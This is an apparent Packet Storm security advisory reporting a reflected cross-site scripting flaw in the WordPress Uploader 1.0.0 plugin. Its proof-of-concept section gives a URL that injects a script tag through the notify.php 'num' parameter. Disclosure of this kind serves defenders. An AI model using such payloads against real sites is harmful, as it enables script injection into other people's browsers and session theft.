WordPress Uploader version 1.0.0 suffers from a cross site scripting vulnerability.
16093e2f61e28329bae00265d529cc1f45f18312a5a43062653cdc942ded7a44------------------------------------------------------------------------
Software................WordPress Uploader 1.0.0
Vulnerability...........Reflected Cross-site Scripting
Download................http://wordpress.org/extend/plugins/uploader/
Release Date............1/24/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in WordPress Uploader
1.0.0 can be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/wordpress/wp-content/plugins/uploader/views/notify.php?num=%3Cscript%3Ealert(0)%3C/script%3E
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed